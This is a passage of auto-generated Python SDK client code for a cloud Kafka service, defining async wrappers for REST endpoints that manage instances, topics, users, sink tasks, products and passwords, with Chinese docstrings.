request_type=request.__class__.__name__) def batch_restart_or_delete_instances_async(self, request): """批量重启或删除实例 批量重启或删除实例。 在实例重启过程中,客户端的生产与消费消息等请求会被拒绝。 实例删除后,实例中原有的数据将被删除,且没有备份,请谨慎操作。 :param BatchRestartOrDeleteInstancesRequest request :return: BatchRestartOrDeleteInstancesResponse """ return self.batch_restart_or_delete_instances_with_http_info(request) def batch_restart_or_delete_instances_with_http_info(self, request): """批量重启或删除实例 批量重启或删除实例。 在实例重启过程中,客户端的生产与消费消息等请求会被拒绝。 实例删除后,实例中原有的数据将被删除,且没有备份,请谨慎操作。 :param BatchRestartOrDeleteInstancesRequest request :return: BatchRestartOrDeleteInstancesResponse """ all_params = ['batch_restart_or_delete_instances_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/action', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='BatchRestartOrDeleteInstancesResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def create_connector_async(self, request): """创建实例的转储节点 创建实例的转储节点。 :param CreateConnectorRequest request :return: CreateConnectorResponse """ return self.create_connector_with_http_info(request) def create_connector_with_http_info(self, request): """创建实例的转储节点 创建实例的转储节点。 :param CreateConnectorRequest request :return: CreateConnectorResponse """ all_params = ['instance_id', 'create_connector_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/connector', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='CreateConnectorResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def create_instance_topic_async(self, request): """Kafka实例创建Topic 该接口用于向Kafka实例创建Topic。 :param CreateInstanceTopicRequest request :return: CreateInstanceTopicResponse """ return self.create_instance_topic_with_http_info(request) def create_instance_topic_with_http_info(self, request): """Kafka实例创建Topic 该接口用于向Kafka实例创建Topic。 :param CreateInstanceTopicRequest request :return: CreateInstanceTopicResponse """ all_params = ['instance_id', 'create_instance_topic_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/topics', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='CreateInstanceTopicResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def create_instance_user_async(self, request): """创建用户 创建Kafka实例的用户,用户可连接开启SASL的Kafka实例。 :param CreateInstanceUserRequest request :return: CreateInstanceUserResponse """ return self.create_instance_user_with_http_info(request) def create_instance_user_with_http_info(self, request): """创建用户 创建Kafka实例的用户,用户可连接开启SASL的Kafka实例。 :param CreateInstanceUserRequest request :return: CreateInstanceUserResponse """ all_params = ['instance_id', 'create_instance_user_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/users', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='CreateInstanceUserResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def create_partition_async(self, request): """新增Kafka实例指定Topic分区 新增Kafka实例指定Topic分区。 :param CreatePartitionRequest request :return: CreatePartitionResponse """ return self.create_partition_with_http_info(request) def create_partition_with_http_info(self, request): """新增Kafka实例指定Topic分区 新增Kafka实例指定Topic分区。 :param CreatePartitionRequest request :return: CreatePartitionResponse """ all_params = ['instance_id', 'topic', 'create_partition_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'topic' in local_var_params: path_params['topic'] = local_var_params['topic'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/management/topics/{topic}/partitions-reassignment', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='CreatePartitionResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def create_post_paid_instance_async(self, request): """创建实例(按需) 创建实例,该接口创建的实例为按需计费的方式。 :param CreatePostPaidInstanceRequest request :return: CreatePostPaidInstanceResponse """ return self.create_post_paid_instance_with_http_info(request) def create_post_paid_instance_with_http_info(self, request): """创建实例(按需) 创建实例,该接口创建的实例为按需计费的方式。 :param CreatePostPaidInstanceRequest request :return: CreatePostPaidInstanceResponse """ all_params = ['create_post_paid_instance_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='CreatePostPaidInstanceResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def create_sink_task_async(self, request): """创建转储任务 创建转储任务。 :param CreateSinkTaskRequest request :return: CreateSinkTaskResponse """ return self.create_sink_task_with_http_info(request) def create_sink_task_with_http_info(self, request): """创建转储任务 创建转储任务。 :param CreateSinkTaskRequest request :return: CreateSinkTaskResponse """ all_params = ['connector_id', 'create_sink_task_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'connector_id' in local_var_params: path_params['connector_id'] = local_var_params['connector_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/connectors/{connector_id}/sink-tasks', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='CreateSinkTaskResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def delete_background_task_async(self, request): """删除后台任务管理中的指定记录 删除后台任务管理中的指定记录。 :param DeleteBackgroundTaskRequest request :return: DeleteBackgroundTaskResponse """ return self.delete_background_task_with_http_info(request) def delete_background_task_with_http_info(self, request): """删除后台任务管理中的指定记录 删除后台任务管理中的指定记录。 :param DeleteBackgroundTaskRequest request :return: DeleteBackgroundTaskResponse """ all_params = ['instance_id', 'task_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'task_id' in local_var_params: path_params['task_id'] = local_var_params['task_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/tasks/{task_id}', method='DELETE', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='DeleteBackgroundTaskResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def delete_instance_async(self, request): """删除指定的实例 删除指定的实例,释放该实例的所有资源。 :param DeleteInstanceRequest request :return: DeleteInstanceResponse """ return self.delete_instance_with_http_info(request) def delete_instance_with_http_info(self, request): """删除指定的实例 删除指定的实例,释放该实例的所有资源。 :param DeleteInstanceRequest request :return: DeleteInstanceResponse """ all_params = ['instance_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}', method='DELETE', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='DeleteInstanceResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def delete_sink_task_async(self, request): """删除单个转储任务 删除单个转储任务。 :param DeleteSinkTaskRequest request :return: DeleteSinkTaskResponse """ return self.delete_sink_task_with_http_info(request) def delete_sink_task_with_http_info(self, request): """删除单个转储任务 删除单个转储任务。 :param DeleteSinkTaskRequest request :return: DeleteSinkTaskResponse """ all_params = ['connector_id', 'task_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'connector_id' in local_var_params: path_params['connector_id'] = local_var_params['connector_id'] if 'task_id' in local_var_params: path_params['task_id'] = local_var_params['task_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/connectors/{connector_id}/sink-tasks/{task_id}', method='DELETE', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='DeleteSinkTaskResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def list_available_zones_async(self, request): """查询可用区信息 在创建实例时,需要配置实例所在的可用区ID,可通过该接口查询可用区的ID。 :param ListAvailableZonesRequest request :return: ListAvailableZonesResponse """ return self.list_available_zones_with_http_info(request) def list_available_zones_with_http_info(self, request): """查询可用区信息 在创建实例时,需要配置实例所在的可用区ID,可通过该接口查询可用区的ID。 :param ListAvailableZonesRequest request :return: ListAvailableZonesResponse """ all_params = [] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/available-zones', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ListAvailableZonesResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def list_background_tasks_async(self, request): """查询实例的后台任务列表 查询实例的后台任务列表。 :param ListBackgroundTasksRequest request :return: ListBackgroundTasksResponse """ return self.list_background_tasks_with_http_info(request) def list_background_tasks_with_http_info(self, request): """查询实例的后台任务列表 查询实例的后台任务列表。 :param ListBackgroundTasksRequest request :return: ListBackgroundTasksResponse """ all_params = ['instance_id', 'start', 'limit', 'begin_time', 'end_time'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] if 'start' in local_var_params: query_params.append(('start', local_var_params['start'])) if 'limit' in local_var_params: query_params.append(('limit', local_var_params['limit'])) if 'begin_time' in local_var_params: query_params.append(('begin_time', local_var_params['begin_time'])) if 'end_time' in local_var_params: query_params.append(('end_time', local_var_params['end_time'])) header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/tasks', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ListBackgroundTasksResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def list_instance_topics_async(self, request): """Kafka实例查询Topic 该接口用于查询指定Kafka实例的Topic详情。 :param ListInstanceTopicsRequest request :return: ListInstanceTopicsResponse """ return self.list_instance_topics_with_http_info(request) def list_instance_topics_with_http_info(self, request): """Kafka实例查询Topic 该接口用于查询指定Kafka实例的Topic详情。 :param ListInstanceTopicsRequest request :return: ListInstanceTopicsResponse """ all_params = ['instance_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/topics', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ListInstanceTopicsResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def list_instances_async(self, request): """查询所有实例列表 查询租户的实例列表,支持按照条件查询。 :param ListInstancesRequest request :return: ListInstancesResponse """ return self.list_instances_with_http_info(request) def list_instances_with_http_info(self, request): """查询所有实例列表 查询租户的实例列表,支持按照条件查询。 :param ListInstancesRequest request :return: ListInstancesResponse """ all_params = ['engine', 'name', 'instance_id', 'status', 'include_failure', 'exact_match_name', 'enterprise_project_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} query_params = [] if 'engine' in local_var_params: query_params.append(('engine', local_var_params['engine'])) if 'name' in local_var_params: query_params.append(('name', local_var_params['name'])) if 'instance_id' in local_var_params: query_params.append(('instance_id', local_var_params['instance_id'])) if 'status' in local_var_params: query_params.append(('status', local_var_params['status'])) if 'include_failure' in local_var_params: query_params.append(('include_failure', local_var_params['include_failure'])) if 'exact_match_name' in local_var_params: query_params.append(('exact_match_name', local_var_params['exact_match_name'])) if 'enterprise_project_id' in local_var_params: query_params.append(('enterprise_project_id', local_var_params['enterprise_project_id'])) header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ListInstancesResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def list_products_async(self, request): """查询产品规格列表 在创建kafka实例时,需要配置订购的产品ID(即product_id),可通过该接口查询产品规格。 例如,要订购按需计费、基准带宽为100MB的kafka实例,可从接口响应消息中,查找Hourly的消息体,然后找到bandwidth为100MB的记录对应的product_id,该product_id的值即是创建上述kafka实例时需要配置的产品ID。 同时,unavailable_zones字段表示资源不足的可用区列表,如果为空,则表示所有可用区都有资源,如果不为空,则表示字段值的可用区没有资源。所以必须确保您购买的资源所在的可用区有资源,不在该字段列表内。 例如,响应消息中bandwidth字段为1200MB的记录,unavailable_zones字段包含cn-east-2b、cn-east-2a和cn-east-2d,表示在华东-上海2的可用区1、可用区2、可用区3都没有该资源。 :param ListProductsRequest request :return: ListProductsResponse """ return self.list_products_with_http_info(request) def list_products_with_http_info(self, request): """查询产品规格列表 在创建kafka实例时,需要配置订购的产品ID(即product_id),可通过该接口查询产品规格。 例如,要订购按需计费、基准带宽为100MB的kafka实例,可从接口响应消息中,查找Hourly的消息体,然后找到bandwidth为100MB的记录对应的product_id,该product_id的值即是创建上述kafka实例时需要配置的产品ID。 同时,unavailable_zones字段表示资源不足的可用区列表,如果为空,则表示所有可用区都有资源,如果不为空,则表示字段值的可用区没有资源。所以必须确保您购买的资源所在的可用区有资源,不在该字段列表内。 例如,响应消息中bandwidth字段为1200MB的记录,unavailable_zones字段包含cn-east-2b、cn-east-2a和cn-east-2d,表示在华东-上海2的可用区1、可用区2、可用区3都没有该资源。 :param ListProductsRequest request :return: ListProductsResponse """ all_params = ['engine'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} query_params = [] if 'engine' in local_var_params: query_params.append(('engine', local_var_params['engine'])) header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/products', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ListProductsResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def list_sink_tasks_async(self, request): """查询转储任务列表 查询转储任务列表。 :param ListSinkTasksRequest request :return: ListSinkTasksResponse """ return self.list_sink_tasks_with_http_info(request) def list_sink_tasks_with_http_info(self, request): """查询转储任务列表 查询转储任务列表。 :param ListSinkTasksRequest request :return: ListSinkTasksResponse """ all_params = ['connector_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'connector_id' in local_var_params: path_params['connector_id'] = local_var_params['connector_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/connectors/{connector_id}/sink-tasks', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ListSinkTasksResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def reset_manager_password_async(self, request): """重置Manager密码 重置Manager密码。 :param ResetManagerPasswordRequest request :return: ResetManagerPasswordResponse """ return self.reset_manager_password_with_http_info(request) def reset_manager_password_with_http_info(self, request): """重置Manager密码 重置Manager密码。 :param ResetManagerPasswordRequest request :return: ResetManagerPasswordResponse """ all_params = ['instance_id', 'reset_manager_password_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/kafka-manager-password', method='PUT', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ResetManagerPasswordResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def reset_message_offset_async(self, request): """重置消费组消费进度到指定位置 Kafka实例不支持在线重置消费进度。在执行重置消费进度之前,必须停止被重置消费组客户端。 > 在停止被重置消费组客户端后,需要经过ConsumerConfig.SESSION_TIMEOUT_MS_CONFIG配置的时间(默认10000毫秒),服务端才认为消费组客户端真正下线。 :param ResetMessageOffsetRequest request :return: ResetMessageOffsetResponse """ return self.reset_message_offset_with_http_info(request) def reset_message_offset_with_http_info(self, request): """重置消费组消费进度到指定位置 Kafka实例不支持在线重置消费进度。在执行重置消费进度之前,必须停止被重置消费组客户端。 > 在停止被重置消费组客户端后,需要经过ConsumerConfig.SESSION_TIMEOUT_MS_CONFIG配置的时间(默认10000毫秒),服务端才认为消费组客户端真正下线。 :param ResetMessageOffsetRequest request :return: ResetMessageOffsetResponse """ all_params = ['instance_id', 'group', 'reset_message_offset_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'group' in local_var_params: path_params['group'] = local_var_params['group'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/management/groups/{group}/reset-message-offset', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ResetMessageOffsetResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def reset_password_async(self, request): """重置密码 重置密码。 :param ResetPasswordRequest request :return: ResetPasswordResponse """ return self.reset_password_with_http_info(request) def reset_password_with_http_info(self, request): """重置密码 重置密码。 :param ResetPasswordRequest request :return: ResetPasswordResponse """ all_params = ['instance_id', 'reset_password_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/password', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ResetPasswordResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def reset_user_passwrod_async(self, request): """重置用户密码 重置用户密码 :param ResetUserPasswrodRequest request :return: ResetUserPasswrodResponse """ return self.reset_user_passwrod_with_http_info(request) def reset_user_passwrod_with_http_info(self, request): """重置用户密码 重置用户密码 :param ResetUserPasswrodRequest request :return: ResetUserPasswrodResponse """ all_params = ['instance_id', 'user_name', 'reset_user_passwrod_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'user_name' in local_var_params: path_params['user_name'] = local_var_params['user_name'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/users/{user_name}', method='PUT', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ResetUserPasswrodResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def resize_instance_async(self, request): """实例规格变更 实例规格变更。 :param ResizeInstanceRequest request :return: ResizeInstanceResponse """ return self.resize_instance_with_http_info(request) def resize_instance_with_http_info(self, request): """实例规格变更 实例规格变更。 :param ResizeInstanceRequest request :return: ResizeInstanceResponse """ all_params = ['instance_id', 'resize_instance_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/extend', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ResizeInstanceResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def restart_manager_async(self, request): """重启Manager 重启Manager。 :param RestartManagerRequest request :return: RestartManagerResponse """ return self.restart_manager_with_http_info(request) def restart_manager_with_http_info(self, request): """重启Manager 重启Manager。 :param RestartManagerRequest request :return: RestartManagerResponse """ all_params = ['instance_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/restart-kafka-manager', method='PUT', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='RestartManagerResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_background_task_async(self, request): """查询后台任务管理中的指定记录 查询后台任务管理中的指定记录。 :param ShowBackgroundTaskRequest request :return: ShowBackgroundTaskResponse """ return self.show_background_task_with_http_info(request) def show_background_task_with_http_info(self, request): """查询后台任务管理中的指定记录 查询后台任务管理中的指定记录。 :param ShowBackgroundTaskRequest request :return: ShowBackgroundTaskResponse """ all_params = ['instance_id', 'task_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'task_id' in local_var_params: path_params['task_id'] = local_var_params['task_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/tasks/{task_id}', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowBackgroundTaskResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_ces_hierarchy_async(self, request): """查询实例在CES的监控层级关系 查询实例在CES的监控层级关系。 :param ShowCesHierarchyRequest request :return: ShowCesHierarchyResponse """ return self.show_ces_hierarchy_with_http_info(request) def show_ces_hierarchy_with_http_info(self, request): """查询实例在CES的监控层级关系 查询实例在CES的监控层级关系。 :param ShowCesHierarchyRequest request :return: ShowCesHierarchyResponse """ all_params = ['instance_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/ces-hierarchy', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowCesHierarchyResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_cluster_async(self, request): """查询Kafka集群元数据信息 查询Kafka集群元数据信息。 :param ShowClusterRequest request :return: ShowClusterResponse """ return self.show_cluster_with_http_info(request) def 